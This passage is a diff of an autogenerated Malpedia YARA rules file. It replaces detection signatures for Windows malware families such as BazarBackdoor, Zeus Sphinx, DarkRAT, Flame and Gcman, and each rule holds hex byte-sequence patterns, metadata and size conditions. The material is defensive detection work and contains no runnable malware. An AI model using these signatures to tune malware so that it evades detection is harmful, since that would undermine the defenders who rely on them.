+		$sequence_7 = { 448bf6 4903df 4981c600ffffff 33d2 41b820030000 4c03f3 e8???????? }
+		$sequence_8 = { 89442420 488b8988010000 448d4204 e8???????? 488b0d???????? 488d8424d0000000 48896c2458 }
+		$sequence_9 = { 488b4108 488d4908 488902 488d5208 }
 
 	condition:
-		7 of them and filesize < 540672
+		7 of them and filesize < 421888
 }
-rule MALPEDIA_Win_Buer_Auto : FILE
+rule MALPEDIA_Win_Ployx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "89828c66-91da-5c73-b764-daf37491e283"
+		id = "61ab771e-15a5-5bf0-85c3-97759fe60e6e"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.buer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.buer_auto.yar#L1-L161"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ployx_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "841b3dfa43e2148141873077b2e81e7484da2dab92e27c89fccfead95f717524"
+		logic_hash = "cb7aed624d5d0c844199f7121f6160ab6100f3d910b00c22bede0a77fbaeb62d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126536,25 +126426,19 @@ rule MALPEDIA_Win_Buer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b45dc 03c6 89414c 8b45fc 03c7 894150 8b45ec }
-		$sequence_1 = { 8b55e8 015158 8b55d8 894148 }
-		$sequence_2 = { 8b00 8b4010 8945fc 61 8b45fc }
-		$sequence_3 = { 3bc7 7d0f 8a0c46 880c18 40 }
-		$sequence_4 = { 8b7b50 8b4340 0345f8 8b5b54 }
-		$sequence_5 = { 8b45f4 03c1 8bcb 894144 8b45f0 }
-		$sequence_6 = { 64a130000000 8b400c 8b4014 8b00 8b4010 }
-		$sequence_7 = { 8bc2 eb19 33c0 85d2 7e13 3bc7 7d0f }
-		$sequence_8 = { 01cf 29ce 75a7 e9???????? }
-		$sequence_9 = { 01de 39d6 0f8384000000 8b742414 }
-		$sequence_10 = { 01c7 0fa5da d3e3 8b4c2444 }
-		$sequence_11 = { 0facd313 884e04 8b74247c 8bc6 8b4c2440 }
-		$sequence_12 = { 0fb617 47 89f9 83e23f eb11 }
-		$sequence_13 = { 01fe 68???????? e8???????? a1???????? }
-		$sequence_14 = { 0f82d1000000 83f8fe 0f83d1000000 89d6 }
-		$sequence_15 = { 01de 39c1 0f47c1 89c1 89442420 662e0f1f840000000000 39f9 }
+		$sequence_0 = { 8d85a4feffff 68???????? 50 e8???????? 8d85a4feffff 68???????? 50 }
+		$sequence_1 = { 81f9???????? 7ce7 5b 8bc6 5f 5e c20400 }
+		$sequence_2 = { 83c418 8945f4 85c0 746f 50 e8???????? 50 }
+		$sequence_3 = { e8???????? 8bf8 8b4d08 47 47 8d0437 50 }
+		$sequence_4 = { 0f8584000000 8d45d4 50 e8???????? }
+		$sequence_5 = { 03c1 99 f7f9 8bf2 83c608 85f6 7e42 }
+		$sequence_6 = { 33ff 99 59 f7f9 8bc2 03c1 99 }
+		$sequence_7 = { aa 53 8d442414 50 ff15???????? 8d442410 68???????? }
+		$sequence_8 = { 880c30 40 0fb64dfc 8a89d8302700 880c30 40 0fb6ca }
+		$sequence_9 = { 83c42c 0005???????? bd???????? bb04010000 55 53 }
 
 	condition:
-		7 of them and filesize < 3031040
+		7 of them and filesize < 229376
 }
 rule MALPEDIA_Win_Bitsran_Auto : FILE
 {
@@ -126595,55 +126479,18 @@ rule MALPEDIA_Win_Bitsran_Auto : FILE
 	condition:
 		7 of them and filesize < 344064
 }
-rule MALPEDIA_Win_Ymir_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ec16ddc4-25ef-5b31-b796-dd562960b36b"
-		date = "2026-01-05"
-		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ymir"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ymir_auto.yar#L1-L92"
-		license_url = "N/A"
-		logic_hash = "853e5b985d29c6039b89b0f82cf98458f3d83850f989fe396b592ab8b2bdf1fe"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20260105"
-		malpedia_hash = "19b79e7cab4eaf532122e5b45a77dd8f6bb5cc79"
-		malpedia_version = "20251219"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 4c89ea 4889c1 4c0f47c3 e8???????? }
-		$sequence_1 = { 4c89ea 4889cb ff5078 488d05a7211000 }
-		$sequence_2 = { 4c89ea 4889d9 41ff14fe eb85 }
-		$sequence_3 = { 4c89ea 4889c1 4989c4 e8???????? 488d1573bf0400 31c9 }
-		$sequence_4 = { 4c89ea 4889c7 488d05ec682800 4c8d3585682800 }
-		$sequence_5 = { 4c89ea 4889c6 498b0424 c744242001000000 }
-		$sequence_6 = { 4c89ea 4889d9 488ba8d8000000 4889ac2488000000 }
-		$sequence_7 = { 4c89ea 4889c1 e8???????? 4189f2 }
-
-	condition:
-		7 of them and filesize < 5530624
-}
-rule MALPEDIA_Win_Kwampirs_Auto : FILE
+rule MALPEDIA_Win_Gcman_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a88d76d0-b266-5ba2-9e4c-b6324e74f1af"
+		id = "5cac84ae-f553-54c6-a2ab-9c6f483e5d7f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kwampirs_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gcman_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "47dcb9c842442be04bc0bae4d6dd96d075eca81ceae0f2c5424da9336b167768"
+		logic_hash = "6db65719f209f972eea7f56ad4db94ab537c244677bf2af532fb68763547fbd8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126657,34 +126504,34 @@ rule MALPEDIA_Win_Kwampirs_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 391f 0f95c0 8b4df0 64890d00000000 59 5f 5e }
-		$sequence_1 = { 83c418 85c0 7512 8b07 50 e8???????? 83c404 }
-		$sequence_2 = { 391f 0f95c0 8b4df0 64890d00000000 }
-		$sequence_3 = { 52 50 8d8dbcf3ffff 51 }
-		$sequence_4 = { 33d2 668955f6 e8???????? 83c40c }
-		$sequence_5 = { ffd6 8b45c0 50 ffd6 }
-		$sequence_6 = { 50 ffd6 8b4dc4 51 ffd6 }
-		$sequence_7 = { 668955f6 e8???????? 83c40c 33d2 }
-		$sequence_8 = { c745fcfeffffff e8???????? b001 8b4df0 }
-		$sequence_9 = { 33d2 6816060000 52 8d85bef3ffff 50 }
+		$sequence_0 = { 01d9 89de 31c6 21ce 31c6 0375c4 01f2 }
+		$sequence_1 = { 8d45d4 89442408 c744240413000020 8b45e4 890424 e8???????? }
+		$sequence_2 = { 89ce 31de 21c6 31de 0375a8 }
+		$sequence_3 = { 31c6 0375b4 01f1 81e979f22a0b c1c10e 01d9 }
+		$sequence_4 = { 89442408 8b4510 89442404 8b45e8 890424 e8???????? }
+		$sequence_5 = { 8b4508 40 0fb600 c0e804 240f 0202 8801 }
+		$sequence_6 = { c1e818 8802 8b550c 83c254 8b450c 8b4014 }
+		$sequence_7 = { 40 8945f4 eb0c 8d45e0 }
+		$sequence_8 = { 01c3 89de 31c6 31d6 0375d4 01f1 81c122619d6d }
+		$sequence_9 = { 890424 e8???????? 8b45ec 8945f4 8b45f4 803800 741f }
 
 	condition:
-		7 of them and filesize < 2695168
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Stration_Auto : FILE
+rule MALPEDIA_Win_Bazarbackdoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "41dc722e-36ee-57b1-9a26-7229c2369407"
+		id = "2eb10499-a33e-504f-b2b6-402a6cc658a9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stration"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stration_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bazarbackdoor_auto.yar#L1-L624"
 		license_url = "N/A"
-		logic_hash = "e64d83d58a5476627a814f6a3e2d0bd532d00a922e21b2d066d65b8e0bc95a9c"
+		logic_hash = "bd8ba9a21bc32243d9a5d52be7c33e7ba5fb181916b5174a91f30401b1052790"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -126696,32 +126543,96 @@ rule MALPEDIA_Win_Stration_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7407 6a01 e8???????? 8a15???????? }
-		$sequence_1 = { 8b4c2434 c1e908 32c8 884c2435 8b542434 c1ea10 }
-		$sequence_2 = { 56 89442420 b37b e8???????? 85ff }
-		$sequence_3 = { 8d4c240c b81f85eb51 f7e9 8bc1 c1fa05 50 }
-		$sequence_4 = { 85db 7474 57 e8???????? 83c404 85c0 }
-		$sequence_5 = { 56 8be8 e8???????? 6a64 }
-		$sequence_6 = { 50 ba11010000 8bcf e8???????? 83fe66 }
-		$sequence_7 = { 83ec14 85c0 756f a1???????? 8b0d???????? }
-		$sequence_8 = { ff15???????? 8a0d???????? 22cb 85f6 8935???????? }
-		$sequence_9 = { 68???????? e8???????? a1???????? 0fafc6 }
+		$sequence_0 = { 488bce 4889442420 ff15???????? 85c0 780a 4898 }
+		$sequence_1 = { 41b8e6b5a12c 448d4a7d e8???????? 4885c0 740c }
+		$sequence_2 = { 4533c0 ffd0 eb03 488bc7 83f8ff }
+		$sequence_3 = { 48635004 85d2 7415 48035138 488b4928 }
+		$sequence_4 = { 0fb70f ff15???????? 0fb74f02 0fb7d8 ff15???????? 0fb74f08 }
+		$sequence_5 = { 488d4d80 e8???????? 498bd6 488d4d80 }
+		$sequence_6 = { ff15???????? 0fb74f08 440fb7e8 ff15???????? }
+		$sequence_7 = { 7507 33c0 e9???????? b8ff000000 }
+		$sequence_8 = { c3 0fb74c0818 b80b010000 663bc8 }
+		$sequence_9 = { cc 4053 4883ec20 b902000000 }
+		$sequence_10 = { 4533c9 4889442428 488d95a0070000 488d442470 41b80f100000 488bce 4889442420 }
+		$sequence_11 = { 418d5508 488bc8 ff15???????? 488bd8 4885c0 }
+		$sequence_12 = { 48c1e108 4803c8 8bc1 488d94059f070000 }
+		$sequence_13 = { 31ff 4889c1 31d2 4989f0 }
+		$sequence_14 = { 488d9590050000 488bce ff15???????? 85c0 }
+		$sequence_15 = { e8???????? 4889c7 8b05???????? 8b0d???????? }
+		$sequence_16 = { e8???????? 4c89e1 e8???????? 8b05???????? }
+		$sequence_17 = { 08ca 80f201 7502 ebfe }
+		$sequence_18 = { 488bd3 e8???????? ff15???????? 4c8bc3 33d2 }
+		$sequence_19 = { 0f94c3 83fa09 0f9fc1 83fa0a 0f9cc2 30da 7519 }
+		$sequence_20 = { 83ff0a 0f9cc3 83ff09 0f9fc0 38d3 }
+		$sequence_21 = { 0fb6d1 80f973 7504 0fb65305 33c0 }
+		$sequence_22 = { 4889442428 488d95b0030000 488d4580 41b80f100000 }
+		$sequence_23 = { 0f9cc3 84d3 7504 30d3 }
+		$sequence_24 = { c744242800000001 4533c9 4533c0 c744242002000000 ba1f000f00 }
+		$sequence_25 = { e8???????? 8bd8 ff15???????? 4d8bc7 }
+		$sequence_26 = { ff15???????? 31db 4889c1 31d2 }
+		$sequence_27 = { e8???????? 4889f1 e8???????? 8b05???????? 8b0d???????? }
+		$sequence_28 = { 89d0 83f0fe 85d0 0f94c2 0f95c0 83f90a 0f9cc3 }
+		$sequence_29 = { 0fb65305 33c0 80f973 0f94c0 }
+		$sequence_30 = { 0fafd0 89d1 83f1fe 21d1 }
+		$sequence_31 = { c744242880000000 c744242003000000 4889f9 ba00000080 41b801000000 }
+		$sequence_32 = { 31ed 4889c1 31d2 4989d8 }
+		$sequence_33 = { 0f9cc3 83f909 0f9fc1 38d3 7507 08c1 }
+		$sequence_34 = { 7528 0fb64b04 0fb6d1 80f973 }
+		$sequence_35 = { 08c1 80f101 7502 ebfe }
+		$sequence_36 = { e8???????? 4c897c2420 4889d9 89fa }
+		$sequence_37 = { 84d2 7405 80fa2e 750f 0fb6c1 }
+		$sequence_38 = { 4889c1 31d2 4d89f8 ffd3 }
+		$sequence_39 = { 31d2 4989d8 ff15???????? 488906 }
+		$sequence_40 = { 4c8bf0 4889442458 488d4801 e8???????? }
+		$sequence_41 = { 4889fa 4189f0 4d89f1 ffd0 }
+		$sequence_42 = { 8d4833 ff15???????? c744242810000000 4533c9 }
+		$sequence_43 = { 4889f1 ba00000080 41b801000000 4531c9 }
+		$sequence_44 = { 48c744243000000000 c744242880000000 c744242003000000 4889f1 ba00000080 }
+		$sequence_45 = { e8???????? 8bc8 e8???????? 8bf8 85ff 7507 6a05 }
+		$sequence_46 = { 3c0a 7223 89d0 24df 04bf 3c1a }
+		$sequence_47 = { 84db 7402 ff06 8d4c2410 e8???????? 33d2 85c0 }
+		$sequence_48 = { 66890d???????? 0fb7ca ff15???????? b901000000 66c746020100 668906 }
+		$sequence_49 = { 7506 8b0e 894c2460 0fb7c0 }
+		$sequence_50 = { 686af17afc 6a04 5a e8???????? 59 }
+		$sequence_51 = { 6685ff 0f849c000000 837c2460ff 0f858c000000 }
+		$sequence_52 = { 33d2 8d8d00ffffff e8???????? eb18 51 8d4e01 e8???????? }
+		$sequence_53 = { 59 59 85c0 740b 8bc8 c60100 41 }
+		$sequence_54 = { 50 0fb745e8 50 68???????? e8???????? }
+		$sequence_55 = { 51 8b4d00 03cf e8???????? 59 3b442414 }
+		$sequence_56 = { 0fb7d8 0fb74708 50 ff15???????? 0fb7c8 }
+		$sequence_57 = { 6a00 ffd3 50 ffd6 33c0 5f 5e }
+		$sequence_58 = { 83f902 0f95c2 83c224 eb05 ba29000000 }
+		$sequence_59 = { 8be5 5d c3 6a40 6800300000 ff7750 }
+		$sequence_60 = { 8d450c 50 ff7508 56 ff15???????? 6a00 }
+		$sequence_61 = { 660f73d801 660febd0 660f7ed0 84c0 }
+		$sequence_62 = { 83c40c 8d4101 51 66a3???????? ff15???????? }
+		$sequence_63 = { 8d7001 81fe80000000 760c 80e1f2 80c902 }
+		$sequence_64 = { 68???????? e8???????? 83c410 b800308804 6a00 }
+		$sequence_65 = { 85d2 740d 33d2 83f902 0f95c2 }
+		$sequence_66 = { 0f848c000000 488b442430 83782000 7460 488b442430 }
+		$sequence_67 = { 7460 488b442430 488b00 8b4028 488b4c2440 4803c8 488bc1 }
+		$sequence_68 = { 89442424 48c744242800000000 41b800100200 488d15d02f0000 488d4c2420 }
+		$sequence_69 = { 4863442430 486bc010 488d0de3380200 4803c8 }
+		$sequence_70 = { 488d0de3380200 4803c8 488bc1 48634c2434 488d04c8 48634c2438 8b0488 }
+		$sequence_71 = { 4533c0 ba01000000 488b4c2440 ff9424a0000000 89842480000000 83bc248000000000 }
+		$sequence_72 = { 488d4c2420 e8???????? 4889442428 4c8d052a200000 }
+		$sequence_73 = { 4c8d052a200000 488b542428 488d4c2420 e8???????? 4889442430 ff542430 }
 
 	condition:
-		7 of them and filesize < 49152
+		7 of them and filesize < 2088960
 }
-rule MALPEDIA_Win_Smominru_Auto : FILE
+rule MALPEDIA_Win_Zeus_Sphinx_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ba1df8df-398d-5a15-b32f-32308ade7ab2"
+		id = "cc60ac31-7ae9-5152-95ad-d09a0d909f1a"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smominru"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.smominru_auto.yar#L1-L160"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeus_sphinx"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zeus_sphinx_auto.yar#L1-L157"
 		license_url = "N/A"
-		logic_hash = "0db1d77f56494f7e7d1098f916a45decdc9bada94ceb297ac850baf6e6d6e3b1"
+		logic_hash = "aa5ca92258dc544d26d29bb94ea2e9b532df6b20bb95794e6914a3376629593d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126735,38 +126646,38 @@ rule MALPEDIA_Win_Smominru_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894634 8b4718 894638 8b471c 89463c 8b4720 894640 }
-		$sequence_1 = { 8b5604 0fa5d0 8907 83c604 }
-		$sequence_2 = { 8b55fc ff5704 837b0c08 7549 }
-		$sequence_3 = { 8d6c2400 6aff 68b0f3e877 ff7508 }
-		$sequence_4 = { c9 c20c00 57 5f 55 54 }
-		$sequence_5 = { 8b55fc f76a14 c1e002 50 8b45fc }
-		$sequence_6 = { 8b5604 81e2ffffff7f 03c2 8bd0 }
-		$sequence_7 = { 8b5604 81ca00000002 33c9 8a8b15020000 }
-		$sequence_8 = { e8???????? 33c0 894704 894708 89470c 894710 894714 }
-		$sequence_9 = { ff15???????? 85c0 0f8c5f37ac7b 33c0 40 }
-		$sequence_10 = { 8b5604 59 e8???????? 85c0 }
-		$sequence_11 = { 8b5604 3bfa 7372 8b1e }
-		$sequence_12 = { 8b55fc ff560c 8b450c ff00 }
-		$sequence_13 = { 8bc6 5e c9 c20800 8d7f00 55 }
-		$sequence_14 = { 5f 55 8d6c2400 8b450c }
-		$sequence_15 = { 8975e0 8975dc 8975c0 8975c8 39750c 0f841948ab7b }
+		$sequence_0 = { 50 e8???????? 891c24 89c6 e8???????? 83c410 8d65f4 }
+		$sequence_1 = { 50 e8???????? 83c410 e8???????? 8d65f8 }
+		$sequence_2 = { 52 53 57 e8???????? ff4750 83c410 }
+		$sequence_3 = { 50 e8???????? 83c420 48 }
+		$sequence_4 = { 50 e8???????? 83c430 85c0 7e0c }
+		$sequence_5 = { 50 e8???????? 83c418 68???????? 68???????? }
+		$sequence_6 = { 50 e8???????? 84c0 745f 8d442414 }
+		$sequence_7 = { 50 e8???????? 83c414 68???????? e8???????? c70424???????? }
+		$sequence_8 = { 01fc eb98 035e14 8ade }
+		$sequence_9 = { 010d???????? 60 5a 98 }
+		$sequence_10 = { 0303 50 ff550c 8b3e }
+		$sequence_11 = { 020a 42 1af6 af }
+		$sequence_12 = { 0162c9 cf 0c06 3c3e }
+		$sequence_13 = { 003b c09bdbe23ea11c 695600663ec700 de07 }
+		$sequence_14 = { 010c02 3bf7 0f85f0f50000 e9???????? }
+		$sequence_15 = { 0008 d7 9f b2d3 }
 
 	condition:
-		7 of them and filesize < 8167424
+		7 of them and filesize < 3268608
 }
-rule MALPEDIA_Win_Unidentified_042_Auto : FILE
+rule MALPEDIA_Win_Darkrat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ae890a66-8da7-5772-a89f-ab1d2760fae8"
+		id = "23e37317-8228-5897-b34f-5636920d388d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_042_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkrat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkrat_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "782ff3cf4462e323a29ec1ed58b2c131a4c6b0f31ed36cc79b62c6515d0facd2"
+		logic_hash = "c66a4bb6e3f6849fe471570a3e9ab067b886ef3521f3b46d24057084154fb02f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126780,32 +126691,32 @@ rule MALPEDIA_Win_Unidentified_042_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8bf0 8b4508 8b00 57 8bf9 c70600000000 }
-		$sequence_1 = { 53 8bd8 56 b800200000 33f6 66858350020000 7410 }
-		$sequence_2 = { 8a1430 40 8855ff 33d2 8d7801 33c9 8955f4 }
-		$sequence_3 = { 66858f50020000 0f8532ffffff c60616 8a977e010000 885601 8a877f010000 884602 }
-		$sequence_4 = { 53 56 8bf0 a1???????? 33db 57 895df8 }
-		$sequence_5 = { 895df4 8d75e8 e8???????? 8bc7 5f 5e }
-		$sequence_6 = { 57 ffd6 a3???????? 85c0 0f8489020000 8d95d7fcffff 52 }
-		$sequence_7 = { c78518f9ffff356c656e c7851cf9ffff636a5a44 c78520f9ffff49577a32 c78524f9ffff59725a56 c78528f9ffff4362620d c7852cf9ffff0a626671 c78530f9ffff73752f38 }
-		$sequence_8 = { 0175f0 c1cf02 89b5ccfeffff 89bdd4feffff 8bfa }
-		$sequence_9 = { 88480a 66859350020000 7548 8b7b18 8d700b 6a41 8bce }
+		$sequence_0 = { 83c408 837b100a 8b7dd4 0f8514ffffff 8b55ec }
+		$sequence_1 = { e8???????? 83c408 c745e800000000 8d4dd8 }
+		$sequence_2 = { 51 56 e8???????? 83c40c c6043e00 eb17 57 }
+		$sequence_3 = { 72bd 8b4d08 42 8bc1 81fa00100000 72a5 8b49fc }
+		$sequence_4 = { 7435 6a13 68???????? 8bcb }
+		$sequence_5 = { 85c0 7527 6a0c 68???????? 8bcb e8???????? }
+		$sequence_6 = { c645fc01 8b45cc 83f810 7227 8d4801 }
+		$sequence_7 = { c7856cffffff0f000000 c68558ffffff00 6880000000 8d8570ffffff c745fc01000000 }
+		$sequence_8 = { c745d400000000 e8???????? 50 e8???????? 83c408 c745e800000000 8d4dd8 }
+		$sequence_9 = { 8b4314 0f43d6 8b7b10 2bc7 8b4dc8 3bc8 7726 }
 
 	condition:
-		7 of them and filesize < 516096
+		7 of them and filesize < 884736
 }
-rule MALPEDIA_Win_Pulsartea_Auto : FILE
+rule MALPEDIA_Win_Flame_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "492a2a3f-efe7-5dcc-8ea0-f274f56c1d7a"
+		id = "9866d719-20ba-56a9-89a4-346e1b2eca8d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pulsartea"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pulsartea_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flame"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flame_auto.yar#L1-L147"
 		license_url = "N/A"
-		logic_hash = "e947490c744b727dc99593cdd46b11ea245b6efcca5c96db4f4a6ac92a6b6da4"
+		logic_hash = "131f2d5e5a8a0cf24fae537b61affbb5c92eae0dfe8bde03b44be173be5d9d24"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126819,32 +126730,36 @@ rule MALPEDIA_Win_Pulsartea_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c745bc00000000 418bde 488b0f 488d55c0 e8???????? }
-		$sequence_1 = { 4889542420 488bcb e8???????? 4d8d870c020000 488d15a6500200 }
-		$sequence_2 = { 488d41f8 4883f81f 0f8789000000 498bc8 e8???????? 4c896e10 48c746180f000000 }
-		$sequence_3 = { 4c8d4d80 4533c0 8bd0 488d8d20060000 ff15???????? 440fb745a4 4533c9 }
-		$sequence_4 = { 418b048e 4133c1 8983a4000000 458842ff 4883ed01 }
-		$sequence_5 = { 488bc8 ff15???????? 85c0 0f84be000000 488b4c2440 488d442448 41b92c010000 }
-		$sequence_6 = { 48c74424480f000000 4088742430 498b442410 4883f810 0f823b0b0000 4883c0f0 41b804000000 }
-		$sequence_7 = { e8???????? 33db 8bf8 85c0 0f8454020000 4c8d25646e0100 448bf3 }
-		$sequence_8 = { 4c897f10 488bc7 48837f1810 7203 488b07 c60000 488b4f10 }
-		$sequence_9 = { c1e806 83e001 418986380c0000 83ff17 756d 0f57c0 448d4f4d }
+		$sequence_0 = { 83f901 7415 e8???????? c70016000000 }
+		$sequence_1 = { 85c9 741a 83f901 7415 }
+		$sequence_2 = { 7573 895dec 8d45ec 50 }
+		$sequence_3 = { 7428 498b5610 8b4f18 8bc3 }
+		$sequence_4 = { 7428 448865dc 41c1ec08 488d55dc 448865dd 8b4f18 }
+		$sequence_5 = { 8d45dc 33f6 6a14 50 8975f4 8975fc }
+		$sequence_6 = { ffd7 90 eb00 4883c430 5f 5e }
+		$sequence_7 = { 7429 488b4c2428 488d542450 41b8df010000 }
+		$sequence_8 = { 8bce 89450c e8???????? 8b06 57 }
+		$sequence_9 = { 894e10 8d4df0 51 6a40 6a0f 50 }
+		$sequence_10 = { 74ac 68???????? ff35???????? e8???????? 59 59 a3???????? }
+		$sequence_11 = { 6a08 59 ff7510 33c0 ff750c 8d7de0 }
+		$sequence_12 = { 7428 41b918000000 4533c0 488bd0 }
+		$sequence_13 = { 8bbb98000000 440fb7c5 4923c7 488bce 4903c4 }
 
 	condition:
-		7 of them and filesize < 520192
+		7 of them and filesize < 1676288
 }
-rule MALPEDIA_Win_Acronym_Auto : FILE
+rule MALPEDIA_Win_Quan_Pin_Loader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce514e29-77d6-5ca8-add6-cd76a31812fc"
+		id = "1fa8c8cd-f609-5225-baa7-0fa410d45d6c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.acronym_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.quan_pin_loader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.quan_pin_loader_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "5cca7d22218319c4f5ca79e1094be5a7a94847bd4819615124c26ef306c59f0d"
+		logic_hash = "4f7da9c0c4a15d34fa1ce0c27eb780960020faa43be4d9d68fb3c3bdcd21f6fc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -126858,32 +126773,32 @@ rule MALPEDIA_Win_Acronym_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 894c05d0 ba04000000 6bd200 8b45ec 894415b4 b904000000 c1e100 }
-		$sequence_1 = { 0fb6c8 85c9 0f84d4000000 8b550c 8955d8 8b4510 50 }
-		$sequence_2 = { 50 8b85e8fdffff 8b08 8b95e8fdffff 52 8b413c }
-		$sequence_3 = { 0fb6c8 85c9 753d 8d4dd8 e8???????? 50 }
-		$sequence_4 = { 83f832 0f8547170000 c745e400000000 8b4de4 894de8 8b55e8 8955e0 }
-		$sequence_5 = { 668b544144 668955fc 0fb745fc c1e004 8b4d08 8d940190c90000 b804000000 }
-		$sequence_6 = { e8???????? 83c404 89853cfeffff 8d4ddc 898d84feffff 8b9584feffff 899540fdffff }
-		$sequence_7 = { 8b4df0 668b544112 668955fc 0fb745fc c1e004 8b4d08 8d940190c90000 }
-		$sequence_8 = { 8d95f4fdffff 52 8d8d50fdffff e8???????? 8bc8 e8???????? 50 }
-		$sequence_9 = { 52 8b450c 50 8b8d0cffffff 51 e8???????? }
+		$sequence_0 = { 8b4d08 e8???????? 85c0 750f 0fb703 6683f80d 7406 }
+		$sequence_1 = { 83630800 488d0524c10400 488903 eb3a 41b804000000 488d15d6ba0400 e8???????? }
+		$sequence_2 = { 4183f904 7410 4183f906 0f85c8fdffff 0fbaea0a eb0a 0fbaea08 }
+		$sequence_3 = { 84d2 7418 c6415401 d1e8 eb14 488d1524a80300 b806000000 }
